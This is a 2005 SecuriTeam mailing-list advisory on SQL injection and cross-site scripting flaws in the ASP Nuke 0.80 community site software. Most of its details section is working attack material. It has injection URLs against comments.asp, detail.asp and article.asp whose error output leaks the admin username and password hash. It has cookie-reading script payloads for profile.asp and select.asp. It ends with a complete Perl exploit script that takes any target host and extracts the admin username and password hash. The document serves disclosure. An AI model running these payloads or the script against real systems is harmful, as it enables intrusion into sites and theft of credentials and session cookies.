From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 25 Apr 2005 15:11:31 +0200
Subject: [NT] ASP Nuke Multiple SQL Injection and XSS Vulnerability
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20050425122708.CB15357F3@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
ASP Nuke Multiple SQL Injection and XSS Vulnerability
------------------------------------------------------------------------
SUMMARY
<http://www.aspnuke.com/>; ASP Nuke is "an open-source software
application for running a community-based web site on a web server".
The lack of parameter filtering allows attackers to steal information and
modify/add/delete or just view information from ASP Nuke's database.
DETAILS
Vulnerable Systems:
* ASP Nuke version 0.80
SQL Injection:
ASP Nuke has many pages that are vulnerable to SQL Injections.
Example #1:
The following URL can be used to trigger an SQL injection vulnerability in
the comments.asp page:
http://localhost/module/support/task/comments.asp?taskid='SQL_INJECTION
SQL INJECTION
Error # -2147217900 (0x80040E14)
Unclosed quotation mark before the character string 'SQL_INJECTION AND
tsk.Active <> 0 AND tsk.Archive = 0'.
SELECT tsk.TaskID, tsk.Title, tsk.Comments, tsk.PctComplete,
usr.FirstName, usr.LastName, pri.PriorityName, sta.StatusName, 0 As
CommentCount, tsk.Created FROM tblTask tsk INNER JOIN tblUser usr ON
tsk.UserID = usr.UserID INNER JOIN tblTaskPriority pri ON pri.PriorityID =
tsk.PriorityID INNER JOIN tblTaskStatus sta ON sta.StatusID = tsk.StatusID
WHERE tsk.TaskID = 'SQL_INJECTION AND tsk.Active <> 0 AND tsk.Archive = 0
Exploit:
To the get the username:
http://localhost/module/support/task/comments.asp?taskid=Username--
This would result in:
Error # -2147217913 (0x80040E07)
Syntax error converting the varchar value 'admin' to a column of data type
int.
SELECT tsk.TaskID, tsk.Title, tsk.Comments, tsk.PctComplete,
usr.FirstName, usr.LastName, pri.PriorityName, sta.StatusName, 0 As
CommentCount, tsk.Created FROM tblTask tsk INNER JOIN tblUser usr ON
tsk.UserID = usr.UserID INNER JOIN tblTaskPriority pri ON pri.PriorityID =
tsk.PriorityID INNER JOIN tblTaskStatus sta ON sta.StatusID = tsk.StatusID
WHERE tsk.TaskID = Username-- AND tsk.Active <> 0 AND tsk.Archive = 0
With "admin" being the username
To the get the password:
http://localhost/module/support/task/comments.asp?taskid=Password--
This would result in:
Error # -2147217913 (0x80040E07)
Syntax error converting the varchar value
'f2349ef3f76a2d980586cb945a1973ba8e9579a9c9411c043be85583f444e015' to a
column of data type int.
SELECT tsk.TaskID, tsk.Title, tsk.Comments, tsk.PctComplete,
usr.FirstName, usr.LastName, pri.PriorityName, sta.StatusName, 0 As
CommentCount, tsk.Created FROM tblTask tsk INNER JOIN tblUser usr ON
tsk.UserID = usr.UserID INNER JOIN tblTaskPriority pri ON pri.PriorityID =
tsk.PriorityID INNER JOIN tblTaskStatus sta ON sta.StatusID = tsk.StatusID
WHERE tsk.TaskID = Password-- AND tsk.Active <> 0 AND tsk.Archive = 0
With "f2349ef3f76a2d980586cb945a1973ba8e9579a9c9411c043be85583f444e015"
being the password hash encrypted in SHA 256
Example #2:
The following URL can be used to trigger an SQL injection vulnerability in
the detail.asp page:
http://localhost/module/support/task/detail.asp?taskid='SQL_INJECTION
SQL INJECTION
Error # -2147217900 (0x80040E14)
Unclosed quotation mark before the character string 'SQL_INJECTION AND
tsk.Active <> 0 AND tsk.Archive = 0'.
SELECT tsk.TaskID, tsk.Title, tsk.Comments, usr.FirstName, usr.LastName,
pri.PriorityName, sta.StatusName, 0 As CommentCount, tsk.Created FROM
tblTask tsk INNER JOIN tblUser usr ON tsk.UserID = usr.UserID INNER JOIN
tblTaskPriority pri ON pri.PriorityID = tsk.PriorityID INNER JOIN
tblTaskStatus sta ON sta.StatusID = tsk.StatusID WHERE tsk.TaskID =
'SQL_INJECTION AND tsk.Active <> 0 AND tsk.Archive = 0
Exploit:
To the get the username:
http://localhost/module/support/task/detail.asp?taskid=Username--
This would result in:
Error # -2147217913 (0x80040E07)
Syntax error converting the varchar value 'admin' to a column of data type
int.
SELECT tsk.TaskID, tsk.Title, tsk.Comments, usr.FirstName, usr.LastName,
pri.PriorityName, sta.StatusName, 0 As CommentCount, tsk.Created FROM
tblTask tsk INNER JOIN tblUser usr ON tsk.UserID = usr.UserID INNER JOIN
tblTaskPriority pri ON pri.PriorityID = tsk.PriorityID INNER JOIN
tblTaskStatus sta ON sta.StatusID = tsk.StatusID WHERE tsk.TaskID =
Username-- AND tsk.Active <> 0 AND tsk.Archive = 0
With "admin" being the username
To the get the password:
http://localhost/module/support/task/detail.asp?taskid=Password--
This would result in:
Error # -2147217913 (0x80040E07)
Syntax error converting the varchar value
'f2349ef3f76a2d980586cb945a1973ba8e9579a9c9411c043be85583f444e015' to a
column of data type int.
SELECT tsk.TaskID, tsk.Title, tsk.Comments, usr.FirstName, usr.LastName,
pri.PriorityName, sta.StatusName, 0 As CommentCount, tsk.Created FROM
tblTask tsk INNER JOIN tblUser usr ON tsk.UserID = usr.UserID INNER JOIN
tblTaskPriority pri ON pri.PriorityID = tsk.PriorityID INNER JOIN
tblTaskStatus sta ON sta.StatusID = tsk.StatusID WHERE tsk.TaskID =
Password-- AND tsk.Active <> 0 AND tsk.Archive = 0
With "f2349ef3f76a2d980586cb945a1973ba8e9579a9c9411c043be85583f444e015"
being the password hash encrypted in SHA 256
Example #3:
The following URL can be used to trigger an SQL injection vulnerability in
the article.asp page:
http://localhost/module/article/article/article.asp?articleid='SQL_INJECTION
SQL INJECTION
Error # -2147217900 (0x80040E14)
Unclosed quotation mark before the character string 'SQL_INJECTION AND
art.Active <> 0 AND art.Archive = 0'.
SELECT art.ArticleID, art.Title, art.ArticleBody, auth.FirstName,
auth.LastName, cat.CategoryName, art.CommentCount, art.Created FROM
tblArticle art INNER JOIN tblArticleAuthor auth ON art.AuthorID =
auth.AuthorID INNER JOIN tblArticleToCategory atc ON atc.ArticleID =
art.ArticleID INNER JOIN tblArticleCategory cat ON atc.CategoryID =
cat.CategoryID WHERE art.ArticleID = 'SQL_INJECTION AND art.Active <> 0
AND art.Archive = 0
Cross Site Scripting:
The following URL can be used to trigger the cross site scripting
vulnerability found in the profile.asp page:
http://localhost/module/discuss/forum/profile.asp?topicid=1&
thradid=346&username='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://localhost/module/support/language/select.asp?
code='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Exploit (Username and Password retrieval):
#!/usr/bin/perl
use IO::Socket;
use Getopt::Std;
print "[x]ASP NUKE 0.80 and below Comments.asp Sql Injection Exploit\n";
print "[x]By Diabolic Crab\n";
print "[x]http://www.digitalparadox.org\n\n";
getopt("h:p:");
$opt_p ||= 80;
if(!$opt_h) {
die("[x] Usage: $0 -h <host> [-p <port>]\n");
}
$sqlpass = "/module/support/task/comments.asp?taskid=Password--
HTTP/1.0\n";
$sqllogin = "/module/support/task/comments.asp?taskid=Username--
HTTP/1.0\n";
print "[x] Host: $opt_h\n";
print "[x] Port: $opt_p\n";
$Q1 = "GET $sqllogin";
$Q1 .= "Host: ".$opt_h."\n\n";
$Q2 = "GET $sqlpass";
$Q2 .= "Host: ".$opt_h."\n\n";
$s = IO::Socket::INET->new(Proto => 'tcp', PeerAddr => $opt_h, PeerPort =>
$opt_p) or die("Can't connect!");
$s->send($Q1);
$s->recv($usr, 1024);
$s = IO::Socket::INET->new(Proto=>'tcp', PeerAddr => $opt_h, PeerPort =>
$opt_p) or die("Can't connect!");
$s->send($Q2);
$s->recv($pass, 1024);
$s = index($usr,"'");
$e = index($usr,"'", $s + 1);
$f = $e - $s - 1;
print "[x]Username in SHA 256 is: ";
print substr($usr, $s + 1, $f);
print "\n";
$s = index($pass,"'");
$e = index($pass,"'", $s + 1);
$f = $e - $s - 1;
print "[x]Password hash in SHA 256 is: ";
print substr($pass, $s + 1, $f);
print "\n";
#EOF
ADDITIONAL INFORMATION
The information has been provided by <mailto:dcrab@hackerscenter.com.>
Diabolic Crab.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
